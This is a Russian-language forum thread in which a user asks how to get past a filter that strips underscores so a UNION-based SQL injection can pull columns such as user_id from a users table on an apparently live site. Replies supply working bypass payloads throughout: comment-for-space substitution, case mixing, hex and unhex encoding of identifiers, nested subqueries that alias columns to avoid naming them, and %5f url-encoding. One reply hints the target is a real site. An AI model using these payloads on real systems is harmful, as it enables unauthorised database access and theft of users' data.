![]() |
Перерыла весь интернет, а толку ноль
Надеюсь, что здесь смогут подсказать. Передаю запрос, но если там встречается нижнее подчеркивание, то оно вырезается и все остальное в запросе тоже. Получается все названия столбцов/таблиц с подчеркиванием не проходят. Например запрос вида: id=-480+union+select+user_id,2+from+users+-- Отбросится все начиная с _id,2+from+users+-- И в итоге запрос не исполнится. Подскажите, пожалуйста, можно как обойти фильтр или это уже не эксплуатируемая инъекция? |
Используй Limit
id=-480+union+select+user_id,2+from+users+LIMIT+1,1 -- И каждый раз меняешь LIMIT 0,1 -- и .тд P.S: кажется я вопроса не понял... Обойти фильтр такими способами 1) вместо + пиши /**/ 2) union = UnIoN и .тд |
Видимо не поняли...
Такое проходит, без подчеркивания: id=-480+union+select+user,2+from+users+-- А с подчеркиванием режет, не проходит: id=-480+union+select+user_id,2+from+users+-- Все что после подчеркивания вырезается. Остается id=-480+union+select+user Лимит и др тут не причем. |
Здесь режется _
Попробуйте закодировать. Функция CHAR() |
Цитата:
Код:
select field_name from table_nameКод:
select 0x6669656C645F6E616D65 from (select 0x7461626C655F6E616D65)k======= UPD Совет не верный. |
nikp а так можно? или опять резать будет?
id=-480+union+select+UNHEX(HEX(user_id)),2+from+users+-- |
Цитата:
id=-480+union+select+unhex(0x757365725f6964),2+from+us ers+LIMIT+1,1 -- |
Функция CHAR() никак не помогает, выводится константа раскодированная в итоге
|
Цитата:
Я думаю в данном случае извратится с mysql не выйдет, и нужно искать способ обхода проверки символа _ в скрипте, например его урл-кодированным эквивалентом (%5f), или же другим способом. |
Цитата:
|
Цитата:
|
Цитата:
возвращает unhex(0x757365725f6964) NULL |
Стaло быть никак =\ Ссылку в студио, пожалуйста!
|
Цитата:
|
Цитата:
|
UPD2
Для поля таблицы можно попробовать такой обход. Нужно подбирать количество полей в таблице users и местоположение интересующего поля. Допустим таблица имеет три поля user_id, user_name, user_password, тогда для вывода второго и третьего поля: Код:
id=-480+union+select+concat(s2,0x3a,s3),2+from+(select+s2,s3+from(select+1,2+s2,3+s3+union+select+*+from+users)k)n--+ |
Вариант 1
Это можно попробывать сделать как-то так: 1 union select * from (select 1,2,3,4,5)b,users,(select 1,2,3,4)a 1 union select 6,users.*,2,3,4,5,1 from users (полный запрос приводить не буду ) Но тут нужно несколько условий. Подробнее: /threadnav43966-6-10.html 53-54 посты Ну и конечно с information_schema попрощаться Вариант 2 Искать двойной запрос и уже в нём нормально крутить в 0x Вариант 3 Не ломать фрагорию (почему-то мне кажется что это именно она )) - это плохо кончится. nikp concat_ws не пропустит из-за "_" |
Ответ дан , тема закрыта. Если у ТС, что то не получится пусть отпишет мне в пм.
Цитата:
Цитата:
|
| Время: 05:56 |